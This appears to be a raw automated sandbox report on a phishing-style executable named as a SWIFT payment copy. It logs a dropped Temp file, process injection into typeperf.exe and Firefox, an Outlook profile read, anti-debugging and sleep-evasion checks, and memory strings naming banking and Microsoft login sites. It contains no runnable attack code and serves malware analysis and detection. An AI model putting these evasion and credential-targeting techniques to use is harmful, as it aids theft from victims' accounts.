            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeProcess created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exe
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\typeperf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: firefox.pdbP source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446184640.000000000078E000.00000002.00000001.01000000.00000005.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000000.1580578250.000000000078E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: typeperf.pdb source: btpqr.exe, 00000004.00000002.1526842326.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838573363.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: btpqr.exe, 00000002.00000003.1372381572.000000001D0B0000.00000004.00001000.00020000.00000000.sdmp, btpqr.exe, 00000002.00000003.1373122144.000000001D250000.00000004.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000CBE000.00000040.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1444358951.000000000097A000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1442583872.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1526329092.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1528531756.0000000002E15000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: btpqr.exe, btpqr.exe, 00000004.00000002.1527020260.0000000000CBE000.00000040.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1444358951.000000000097A000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1442583872.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1526329092.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1528531756.0000000002E15000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: typeperf.pdbGCTL source: btpqr.exe, 00000004.00000002.1526842326.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838573363.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeUnpacked PE file: 4.2.btpqr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004151D6 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_004151D6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040E015 push ecx; ret 2_2_0040E028
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040A60A push ecx; ret 2_2_0040A61D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_00429EF8 push eax; ret 2_2_00429F59
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_00429FA8 push eax; ret 2_2_00429F59
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040D054 push ebx; retf 4_2_0040D05A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0041429A push ebx; iretd 4_2_0041429B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004034A0 push eax; ret 4_2_004034A2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00414556 push esp; iretd 4_2_0041455E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00407DC3 push esp; retf 4_2_00407DE2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0041ADA3 push edi; iretd 4_2_0041ADA5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0042B7C2 push eax; ret 4_2_0042B7C4
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B2225F pushad ; ret 4_2_00B227F9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B227FA pushad ; ret 4_2_00B227F9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B2283D push eax; iretd 4_2_00B22858
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B509AD push ecx; mov dword ptr [esp], ecx4_2_00B509B6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B21368 push eax; iretd 4_2_00B21369
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05033465 push ebx; retf 5_2_0503346B
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05041CE6 push eax; ret 5_2_05041CF3
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_050419A9 pushfd ; retf 5_2_050419AF
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_050411B4 push edi; iretd 5_2_050411B6
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_0502E1D4 push esp; retf 5_2_0502E1F3
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05041B5E pushad ; retf 5_2_05041B6E
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05051BD3 push eax; ret 5_2_05051BD5
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05041AE4 pushad ; retf 5_2_05041B6E
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC225F pushad ; ret 6_2_02FC27F9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC27FA pushad ; ret 6_2_02FC27F9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC283D push eax; iretd 6_2_02FC2858
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FF09AD push ecx; mov dword ptr [esp], ecx6_2_02FF09B6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC1200 push eax; iretd 6_2_02FC1369
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006F21AC push 38B5450Eh; iretd 6_2_006F21BF
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0070831F push eax; ret 6_2_00708321
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeFile created: C:\Users\user\AppData\Local\Temp\btpqr.exe
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040B64C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0040B64C
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B9096E rdtsc 4_2_00B9096E
            Source: C:\Windows\SysWOW64\typeperf.exeWindow / User API: threadDelayed 9832
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeAPI coverage: 1.3 %
            Source: C:\Windows\SysWOW64\typeperf.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7752Thread sleep count: 139 > 30
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7752Thread sleep time: -278000s >= -30000s
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7752Thread sleep count: 9832 > 30
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7752Thread sleep time: -19664000s >= -30000s
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep count: 42 > 30
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep time: -42000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\typeperf.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006FC010 FindFirstFileW,FindNextFileW,FindClose,6_2_006FC010
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004277DA GetSystemInfo,2_2_004277DA
            Source: 281B196J.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: discord.comVMware20,11696494690f
            Source: 281B196J.6.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 281B196J.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: 281B196J.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 281B196J.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838730191.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
            Source: 281B196J.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: 281B196J.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 281B196J.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: 281B196J.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: 281B196J.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 281B196J.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: 281B196J.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: 281B196J.6.drBinary or memory string: global block list test formVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: 281B196J.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 281B196J.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 281B196J.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: 281B196J.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeAPI call chain: ExitProcess graph end nodegraph_0-3203
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\typeperf.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B9096E rdtsc 4_2_00B9096E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004173A3 LdrLoadDll,4_2_004173A3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040E1C5 _memset,IsDebuggerPresent,2_2_0040E1C5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004151D6 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_004151D6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0042705F mov eax, dword ptr fs:[00000030h]2_2_0042705F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0042717B mov eax, dword ptr fs:[00000030h]2_2_0042717B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_00427109 mov eax, dword ptr fs:[00000030h]2_2_00427109
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0042713E mov eax, dword ptr fs:[00000030h]2_2_0042713E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B480A0 mov eax, dword ptr fs:[00000030h]4_2_00B480A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE80A8 mov eax, dword ptr fs:[00000030h]4_2_00BE80A8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5208A mov eax, dword ptr fs:[00000030h]4_2_00B5208A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C0F0 mov eax, dword ptr fs:[00000030h]4_2_00B4C0F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B920F0 mov ecx, dword ptr fs:[00000030h]4_2_00B920F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A0E3 mov ecx, dword ptr fs:[00000030h]4_2_00B4A0E3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B580E9 mov eax, dword ptr fs:[00000030h]4_2_00B580E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD60E0 mov eax, dword ptr fs:[00000030h]4_2_00BD60E0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD20DE mov eax, dword ptr fs:[00000030h]4_2_00BD20DE
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C160B8 mov eax, dword ptr fs:[00000030h]4_2_00C160B8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C160B8 mov ecx, dword ptr fs:[00000030h]4_2_00C160B8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE6030 mov eax, dword ptr fs:[00000030h]4_2_00BE6030
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A020 mov eax, dword ptr fs:[00000030h]4_2_00B4A020
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C020 mov eax, dword ptr fs:[00000030h]4_2_00B4C020
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E016 mov eax, dword ptr fs:[00000030h]4_2_00B6E016
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD4000 mov ecx, dword ptr fs:[00000030h]4_2_00BD4000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF2000 mov eax, dword ptr fs:[00000030h]4_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7C073 mov eax, dword ptr fs:[00000030h]4_2_00B7C073
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B52050 mov eax, dword ptr fs:[00000030h]4_2_00B52050
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6050 mov eax, dword ptr fs:[00000030h]4_2_00BD6050
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C161C3 mov eax, dword ptr fs:[00000030h]4_2_00C161C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD019F mov eax, dword ptr fs:[00000030h]4_2_00BD019F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A197 mov eax, dword ptr fs:[00000030h]4_2_00B4A197
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A197 mov eax, dword ptr fs:[00000030h]4_2_00B4A197
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A197 mov eax, dword ptr fs:[00000030h]4_2_00B4A197
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C261E5 mov eax, dword ptr fs:[00000030h]4_2_00C261E5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B90185 mov eax, dword ptr fs:[00000030h]4_2_00B90185
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF4180 mov eax, dword ptr fs:[00000030h]4_2_00BF4180
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF4180 mov eax, dword ptr fs:[00000030h]4_2_00BF4180
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B801F8 mov eax, dword ptr fs:[00000030h]4_2_00B801F8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0C188 mov eax, dword ptr fs:[00000030h]4_2_00C0C188
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0C188 mov eax, dword ptr fs:[00000030h]4_2_00C0C188
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov eax, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov eax, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov ecx, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov eax, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov eax, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B80124 mov eax, dword ptr fs:[00000030h]4_2_00B80124
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24164 mov eax, dword ptr fs:[00000030h]4_2_00C24164
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24164 mov eax, dword ptr fs:[00000030h]4_2_00C24164
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFA118 mov ecx, dword ptr fs:[00000030h]4_2_00BFA118
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFA118 mov eax, dword ptr fs:[00000030h]4_2_00BFA118
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFA118 mov eax, dword ptr fs:[00000030h]4_2_00BFA118
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFA118 mov eax, dword ptr fs:[00000030h]4_2_00BFA118
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov ecx, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov ecx, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov ecx, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov ecx, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C10115 mov eax, dword ptr fs:[00000030h]4_2_00C10115
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56154 mov eax, dword ptr fs:[00000030h]4_2_00B56154
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56154 mov eax, dword ptr fs:[00000030h]4_2_00B56154
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C156 mov eax, dword ptr fs:[00000030h]4_2_00B4C156
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE8158 mov eax, dword ptr fs:[00000030h]4_2_00BE8158
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov eax, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov eax, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov ecx, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov eax, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE4144 mov eax, dword ptr fs:[00000030h]4_2_00BE4144
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C262D6 mov eax, dword ptr fs:[00000030h]4_2_00C262D6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602A0 mov eax, dword ptr fs:[00000030h]4_2_00B602A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602A0 mov eax, dword ptr fs:[00000030h]4_2_00B602A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov ecx, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE62A0 mov eax, dword ptr fs:[00000030h]4_2_00BE62A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E284 mov eax, dword ptr fs:[00000030h]4_2_00B8E284
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E284 mov eax, dword ptr fs:[00000030h]4_2_00B8E284
